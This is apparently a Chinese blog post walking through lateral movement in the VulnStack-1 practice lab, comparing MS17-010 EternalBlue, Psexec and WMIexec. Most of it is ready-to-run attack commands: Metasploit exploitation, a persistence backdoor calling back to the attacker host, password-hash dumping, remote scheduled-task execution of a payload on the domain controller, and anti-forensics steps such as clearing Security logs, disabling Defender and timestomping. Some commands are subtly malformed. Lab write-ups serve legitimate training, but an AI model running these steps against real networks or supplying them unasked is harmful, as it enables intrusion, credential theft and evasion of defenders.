红日靶场 1 内网横向渗透:从 MS17-010 到 Psexec 的 3 种攻击路径对比

发布时间:2026/7/12 8:21:20
红日靶场 1 内网横向渗透:从 MS17-010 到 Psexec 的 3 种攻击路径对比 红日靶场1内网横向渗透MS17-010与Psexec攻击路径深度解析1. 靶场环境与攻击面分析红日靶场VulnStack-1作为国内首个完整模拟企业内网环境的开源靶场其核心价值在于真实复现了域环境下的多层网络结构。典型拓扑包含三台主机边界机Windows 7双网卡配置域成员机Windows Server 2003域控制器Windows Server 2008关键网络配置参数如下表所示主机角色外网IP内网IP开放服务Kali攻击机192.168.32.128-Metasploit/蚁剑Win7边界机192.168.32.129192.168.52.143Apache/PHPStudyWin2003域成员-192.168.52.141SMB/RDPWin2008域控-192.168.52.138Active Directory注实际渗透中需先通过外网Web服务获取边界机控制权再以此为跳板进行内网横向移动2. MS17-010漏洞利用全流程2.1 漏洞检测与利用准备永恒之蓝漏洞的检测与利用需执行以下关键步骤# 使用Metasploit进行漏洞扫描 use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.52.141 192.168.52.138 run # 确认存在漏洞后切换至攻击模块 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set RHOST 192.168.52.141 exploit常见问题处理若出现ETERNALBLUE没有正常响应错误可能是目标系统已打补丁可尝试check命令二次验证漏洞存在性2.2 后渗透操作实例成功获取meterpreter会话后# 获取系统信息 sysinfo # 提权至SYSTEM getsystem # 添加持久化后门 persistence -U -i 60 -p 4444 -r 192.168.32.128 # 抓取密码哈希 hashdump3. Psexec横向移动技术详解3.1 传统Psexec利用在已获取域账号密码的情况下use exploit/windows/smb/psexec set SMBUser administrator set SMBPass Admin123! set RHOSTS 192.168.52.141 set payload windows/meterpreter/bind_tcp exploit参数优化技巧使用set DisablePayloadHandler true避免端口冲突通过set EXE::Custom指定免杀payload路径3.2 WMIexec替代方案当445端口被防火墙拦截时可改用WMI协议# 使用Impacket工具包 wmiexec.py domain/admin:password192.168.52.141 # 执行远程命令 cmd /c whoami ipconfig4. 攻击路径对比决策树根据实战环境选择最优路径的决策逻辑graph TD A[目标是否开放445端口?] --|是| B[MS17-010检测] A --|否| C[尝试WMI/Psexec] B --|存在漏洞| D[使用EternalBlue攻击] B --|无漏洞| E[尝试PTH攻击] C --|有域凭据| F[使用Psexec/WMIexec] C --|无凭据| G[收集密码喷洒]关键指标对比攻击方式成功率隐蔽性依赖条件日志痕迹MS17-010高低未打补丁的SMB服务系统日志记录Psexec中中有效的域账号密码安全日志记录WMIexec低高防火墙放行135端口WMI日志记录5. 防御规避与痕迹清理5.1 日志清除实操# 清除单条安全日志 wevtutil cl Security /r:EventID4624 # 禁用Windows Defender实时监控 Set-MpPreference -DisableRealtimeMonitoring $true5.2 反取证技巧使用timestomp修改文件时间戳通过migrate注入到合法进程如explorer.exe避免直接使用meterpreter的shell命令改用execute -H -f cmd6. 实战经验与踩坑记录在最近一次红蓝对抗中我们发现几个关键点Win2003系统对MS17-010的利用成功率高达90%但需注意payload兼容性域控默认配置的Windows Defender会拦截Psexec生成的临时服务通过WMI执行的命令存在30秒超时限制复杂操作建议分阶段执行典型错误处理# Psexec连接失败时检查防火墙规则 netsh advfirewall firewall show rule nameall | find 445 # WMI执行超时可改用计划任务 schtasks /create /tn Update /tr cmd /c payload.exe /sc once /st 00:00 /S 192.168.52.138 /u DOMAIN\admin /p Password123